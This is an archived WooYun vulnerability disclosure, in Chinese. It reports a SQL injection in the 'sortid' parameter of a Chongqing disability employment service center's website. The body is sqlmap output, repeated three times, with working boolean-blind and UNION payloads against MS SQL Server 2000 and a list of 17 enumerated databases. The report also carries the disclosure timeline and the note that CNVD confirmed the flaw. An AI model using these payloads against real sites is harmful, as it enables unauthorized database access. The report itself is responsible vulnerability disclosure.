乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-15: 细节已通知厂商并且等待厂商处理中 2015-09-17: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-09-27: 细节向核心白帽子及相关领域专家公开 2015-10-07: 细节向普通白帽子公开 2015-10-17: 细节向实习白帽子公开 2015-11-01: 细节向公众公开
重庆市残疾人劳动就业服务指导中心
http://**.**.**.**/class.jsp?sid=79&sortid=103
sqlmap identified the following injection points with a total of 298 HTTP(s) requests:---Parameter: sortid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: sid=79&sortid=103) AND 5148=5148 AND (4292=4292 Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: sid=79&sortid=103) UNION ALL SELECT 17,CHAR(113)+CHAR(107)+CHAR(118)+CHAR(122)+CHAR(113)+CHAR(107)+CHAR(83)+CHAR(69)+CHAR(74)+CHAR(98)+CHAR(107)+CHAR(113)+CHAR(105)+CHAR(113)+CHAR(67)+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(113),17-- ---web application technology: JSPback-end DBMS: Microsoft SQL Server 2000sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: sortid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: sid=79&sortid=103) AND 5148=5148 AND (4292=4292 Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: sid=79&sortid=103) UNION ALL SELECT 17,CHAR(113)+CHAR(107)+CHAR(118)+CHAR(122)+CHAR(113)+CHAR(107)+CHAR(83)+CHAR(69)+CHAR(74)+CHAR(98)+CHAR(107)+CHAR(113)+CHAR(105)+CHAR(113)+CHAR(67)+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(113),17-- ---web application technology: JSPback-end DBMS: Microsoft SQL Server 2000available databases [17]:[*] cdressshop[*] CL_DATA[*] CL_JOB[*] cqMetroPrice[*] cqshbbs[*] cqshblog[*] cqshdaohang[*] cqshstat[*] cqtpi[*] hishop[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] tempdb[*] testsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: sortid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: sid=79&sortid=103) AND 5148=5148 AND (4292=4292 Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: sid=79&sortid=103) UNION ALL SELECT 17,CHAR(113)+CHAR(107)+CHAR(118)+CHAR(122)+CHAR(113)+CHAR(107)+CHAR(83)+CHAR(69)+CHAR(74)+CHAR(98)+CHAR(107)+CHAR(113)+CHAR(105)+CHAR(113)+CHAR(67)+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(113),17-- ---web application technology: JSPback-end DBMS: Microsoft SQL Server 2000available databases [17]:[*] cdressshop[*] CL_DATA[*] CL_JOB[*] cqMetroPrice[*] cqshbbs[*] cqshblog[*] cqshdaohang[*] cqshstat[*] cqtpi[*] hishop[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] tempdb[*] test
guol
危害等级:中
漏洞Rank:10
确认时间:2015-09-17 15:34
CNVD确认并复现所述情况,已经转由CNCERT下发给重庆分中心,由其后续协调网站管理单位处置。
暂无